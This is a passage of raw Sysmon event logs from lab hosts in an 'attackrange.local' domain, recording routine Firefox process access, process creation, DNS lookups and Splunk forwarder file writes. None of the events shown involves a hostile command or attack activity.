Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105768Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.091{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105767Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.091{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105766Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.091{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+e48ccc|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000105765Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.091{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+e48c43|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105764Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.091{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+c2e55|C:\Program Files\Mozilla Firefox\xul.dll+e4891a|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167bf03|C:\Program Files\Mozilla Firefox\xul.dll+19d7726|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105763Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.090{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+a0942f|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+166d71b|C:\Program Files\Mozilla Firefox\xul.dll+19cd045|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105762Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.084{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105761Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.084{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105760Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.083{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105759Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.083{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105758Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.083{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105757Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.083{58E9C193-B422-615A-0602-00000000FC01}55524268C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+2f07d|C:\Program Files\Mozilla Firefox\firefox.exe+2e285|C:\Program Files\Mozilla Firefox\xul.dll+1fd1d9a|C:\Program Files\Mozilla Firefox\xul.dll+a04e9a|C:\Program Files\Mozilla Firefox\xul.dll+a03065|C:\Program Files\Mozilla Firefox\xul.dll+a0a25e|C:\Program Files\Mozilla Firefox\xul.dll+8b1df0|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105756Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.083{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5552.9.725066465\1658646680" -childID 5 -isForBrowser -prefsHandle 6520 -prefMapHandle 6528 -prefsLen 11412 -prefMapSize 235910 -jsInit 1076 285716 -parentBuildID 20210922161155 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 6516 2b08d81af38 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92LowMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 17141700x8000000000000000105755Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:39.075{58E9C193-B422-615A-0602-00000000FC01}5552\chrome.5552.9.72506646C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105827Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.950{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AAA389F8AA665D4BF5E825AE0B61CA2,SHA256=E6A2A87C7E34F9C099F2C706066313B9BE7D5E19E9BA5BFF31DAD9EE63289F77,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105826Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.172{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64509- 354300x8000000000000000105825Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.543{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-56458-true2001:500:12:0:0:0:0:d0d-53domain 354300x8000000000000000105824Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.172{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63202- 354300x8000000000000000105823Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.172{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59113- 23542300x800000000000000082890Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:40.593{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B216427201339C839F1BF8A83A1AB7BB,SHA256=123711577D5C3B6CAD41676C7D821D1E6801307849A250AC34DC756E78F80D8D,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000105822Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.640{58E9C193-B422-615A-0602-00000000FC01}5552consent.google.com02a00:1450:4001:80e::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105821Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.637{58E9C193-B422-615A-0602-00000000FC01}5552consent.google.com0142.250.185.110;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105820Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.636{58E9C193-B422-615A-0602-00000000FC01}5552consent.google.com0::ffff:142.250.185.110;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105819Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.399{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105818Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.398{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105817Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.398{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105816Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.397{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105815Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.397{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105814Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.392{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105813Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.391{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\permissions.sqlite-journalMD5=2DEFD3F55451DD4FE482660D79A5323F,SHA256=833FB84CD362B0C5C8D43ED0A0B6CFE01390AE082E8F0CE288578709CD2F898E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105812Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.088{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC09D0886A40CA77F2A65626FE5D8192,SHA256=8BF6B76200E29F9953DA3F06D771DBCF6A990E036631A2C65912D08D450D17D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105811Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.086{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA75480B23B5B3BCDA3829FD12CE67CA,SHA256=77FE39D2D73E5171F92C6B585C5254D18637D3057BF3D18536A67D6B0198CD0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082891Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:41.593{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 